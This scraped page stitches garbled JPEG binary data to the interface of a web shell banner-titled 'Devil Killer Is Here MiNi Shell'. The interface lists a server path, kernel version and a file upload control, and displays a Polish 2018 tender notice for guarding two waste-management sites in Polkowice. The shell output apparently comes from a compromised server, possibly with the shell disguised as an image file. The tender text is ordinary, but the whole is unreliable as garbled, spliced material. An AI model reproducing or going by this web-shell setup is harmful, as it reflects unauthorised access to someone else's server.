JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20181206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20181206/658001-N-2018.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 658001-N-2018 z dnia 2018-12-06 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Polkowicka Dolina Recyklingu sp. z o.o.</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Dozór i ochrona mienia na terenie Zakładu Gospodarki Odpadami, ul. Działkowa 20 oraz na terenie Centralnego Punktu Selektywnej Zbiórki Odpadów, ul. Działkowa 18 w Polkowicach</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Usługi</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Polkowicka Dolina Recyklingu sp. z o.o.</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">368345060</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">Dąbrowskiego</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">2</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">59-100</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Polkowice</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">dolnośląskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">+48608557725, </span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">pdr@pdr-eko.pl, </span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">-</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">http://pdr-eko.pl/</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Podmiot prawa publicznego</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny"></span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">http://bip.pdr-eko.pl/</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">http://bip.pdr-eko.pl/</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">Pisemnie</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">W siedzibie Zamawiającego w Polkowicach przy ul. Dąbrowskiego 2 w sekretariacie PDR sp. z o.o.</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Dozór i ochrona mienia na terenie Zakładu Gospodarki Odpadami, ul. Działkowa 20 oraz na terenie Centralnego Punktu Selektywnej Zbiórki Odpadów, ul. Działkowa 18 w Polkowicach</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny"></span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Usługi</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Tak</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski">wszystkich części</span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">Zadanie: Dozór i ochrona mienia na terenie dwóch obiektów na 2019 rok: 1)	Zadanie nr 1Dozór i ochrona mienia na terenie Zakładu Gospodarki Odpadami, ul. Działkowa 20, Polkowice,2)	Zadanie nr 2Dozór i ochrona mienia na terenie Centralnego Punkt Selektywnej Zbiórki Odpadów w Polkowicach, ul. Działkowa 18, Polkowice.Szczegółowe informacje zostały wskazane w SIWZ</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">79710000-4</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Tak</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst">Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 67 ust. 1 pkt 6, polegających na powtórzeniu podobnych usług, których zakres stanowić będzie nie więcej niż 50% wartości zamówienia podstawowego. Powyższe zamówienie udzielane będzie mogło być w okresie 3 lat od dnia udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy usług.</span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2020-01-02</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow">1. Zamawiający dopuszcza składanie ofert częściowych na każdą ze wskazanych powyżej części.2. Zamawiający nie zastrzega obowiązku osobistego wykonania przez wykonawcę kluczowych części zamówienia.3. Na podstawie art. 29 ust 3a oraz w związku z art. 36 ust 2 pkt 8a) ustawy Zamawiający wymaga zatrudnienia na podstawie umowy o pracę przez Wykonawcę lub podwykonawcę osób wykonujących wskazane poniżej czynności w trakcie realizacji przedmiotowego zamówienia: a)	w przypadku składania oferty na część 1 co najmniej 6 osób zdolnych do wykonania zamówienia, w wieku poniżej 65 roku życia, niekaralnymi i legitymującymi się min 2- letnim stażem pracy na stanowisku pracownika ochrony, wykonujących czynności - związane z ochroną mienia na terenie Zakładu Gospodarki Odpadami ( ul Działkowa 20 ),b)	w przypadku składania oferty na część 2 co najmniej 3 osoby zdolnych do wykonania zamówienia, w wieku poniżej 65 roku życia, niekaralnymi i legitymującymi się min 2- letnim stażem pracy na stanowisku pracownika ochrony, wykonujących czynności - związane z ochroną mienia na terenie Centralnego Punktu Selektywnej Zbiórki Odpadów (ul. Działkowa 18) w Polkowicach,c)	w przypadku składania oferty łącznie na część 1 i 2, Zamawiający wymaga spełnienia łącznie w/w wymogów tj. wykazania co najmniej 9 osób zdolnych do wykonania zamówienia , w wieku poniżej 65 roku życia, niekaralnymi i legitymującymi się min 2- letnim stażem pracy na stanowisku pracownika ochrony, wykonujących czynności - związane z ochroną mienia na terenie Zakładu Gospodarki Odpadami ( ul Działkowa 20 ) oraz na terenie Centralnego Punktu Selektywnej Zbiórki Odpadów (ul. Działkowa 18) w Polkowicach, d)	w przypadku składania oferty na część 1 lub 2 odrębnie lub też łącznie (tj. niezależnie od ilości części na które jest składana oferta) co najmniej 4 osoby zdolne do wykonania zamówienia, w wieku poniżej 65 roku życia, niekaralnymi i legitymującymi się min 2- letnim stażem pracy na stanowisku grupy interwencyjno-patrolowej, wykonujących czynności prewencji (grupy interwencyjnej) mogącej zareagować na terenie chronionych obiektów w czasie do 15 minut od telefonicznego wezwania ,działający 24h na dobę.Zamawiający na czas urlopów oraz usprawiedliwionej nieobecności pracownika ochrony dopuszcza zastępstwo tych osób na podstawie umowy cywilno-prawnej .Sposób dokumentowania zatrudnienia osób, o których mowa w niniejszym punkcie, oraz uprawnienia zamawiającego w zakresie kontroli spełnienia przez wykonawcę wymagań określonych w art. 29 ust. 3a ustawy, oraz sankcji z tytułu niespełnienia tych wymagań, określone zostały w § 6 wzoru umowy, który stanowi integralną część SIWZ.</span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Wykonawca spełni warunek jeżeli wykaże:a)	posiadanie uprawnień do wykonywania działalności polegającej na ochronie mienia - ważna koncesja wydana przez Ministerstwo Spraw Wewnętrznych i Administracji na prowadzenie działalności gospodarczej w zakresie usług ochrony osób i mienia realizowanych w formie bezpośredniej ochrony fizycznej zgodnie z ustawą z dnia 22 sierpnia 1997 roku o ochronie osób i mienia (Dz.U. z 2018 roku poz. 2142).</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow">W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki, o których mowa w rozdz. III. pkt 1.1) zostaną spełnione wyłącznie jeżeli: a)	każdy z nich posiada uprawnienia do prowadzenia działalności gospodarczej w zakresie usług ochrony osób i mienia realizowanych w formie bezpośredniej ochrony fizycznej zgodnie z ustawą z dnia 22 sierpnia 1997 roku o ochronie osób i mienia (t.j. Dz.U. z 2018 roku poz. 2142);</span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow"></span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Wykonawca spełni warunek jeżeli wykaże:a)	należytą realizację w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie co najmniej dwóch zamówienia polegających na wykonywaniu usług ochrony mienia i budynków obejmujących sprawowanie ochrony mienia wraz z obsługą interwencyjną na zewnątrz obiektów o powierzchni min 1500 m2 i o wartości nie mniejszej niż 50.000 zł brutto każda.b)	możliwość dysponowania osobami, które będą uczestniczyć w wykonaniu przedmiotowego zamówienia:-	w przypadku składania oferty na część 1 co najmniej 6 osób zdolnych do wykonania zamówienia, w wieku poniżej 65 roku życia, niekaralnymi i legitymującymi się min 2- letnim stażem pracy na stanowisku pracownika ochrony, wykonujących czynności -związane z ochroną mienia na terenie Zakładu Gospodarki Odpadami ( ul Działkowa 20 ),-	w przypadku składania oferty na część 2 co najmniej 3 osoby zdolnych do wykonania zamówienia , w wieku poniżej 65 roku życia, niekaralnymi i legitymującymi się min 2- letnim stażem pracy na stanowisku pracownika ochrony, wykonujących czynności -związane z ochroną mienia na terenie Centralnego Punktu Selektywnej Zbiórki Odpadów (ul. Działkowa 18) w Polkowicach,-	w przypadku składania oferty łącznie na część 1 i 2, Zamawiający wymaga spełnienia łącznie w/w wymogów, tj. wykazania co najmniej 9 osób zdolnych do wykonania zamówienia , w wieku poniżej 65 roku życia, niekaralnymi i legitymującymi się min 2- letnim stażem pracy na stanowisku pracownika ochrony, wykonujących czynności - związane z ochroną mienia na terenie Zakładu Gospodarki Odpadami ( ul Działkowa 20 ) oraz na terenie Centralnego Punktu Selektywnej Zbiórki Odpadów (ul. Działkowa 18) w Polkowicach-	w przypadku składania oferty na część 1 lub 2 odrębnie lub też łącznie (tj. niezależnie od ilości części na które jest składana oferta) co najmniej 4 osoby zdolne do wykonania zamówienia, w wieku poniżej 65 roku życia, niekaralnymi i legitymującymi się min 2- letnim stażem pracy na stanowisku grupy interwencyjno-patrolowej , wykonujących czynności prewencji (grupy interwencyjnej) mogącej zareagować na terenie chronionych obiektów w czasie do 15 minut od telefonicznego wezwania, działający 24h na dobę.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe">W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia warunki, o których mowa w rozdz. III. pkt 1.3) zostaną spełnione wyłącznie jeżeli: b)	co najmniej jeden z nich wykaże samodzielną realizację co najmniej dwóch zamówienia polegających na wykonywaniu usług ochrony mienia i budynków obejmujących sprawowanie ochrony mienia wraz z obsługą interwencyjną na zewnątrz obiektów o powierzchni min 1500 m2 i o wartości nie mniejszej niż 50.000 zł brutto każda.</span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Nie</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ 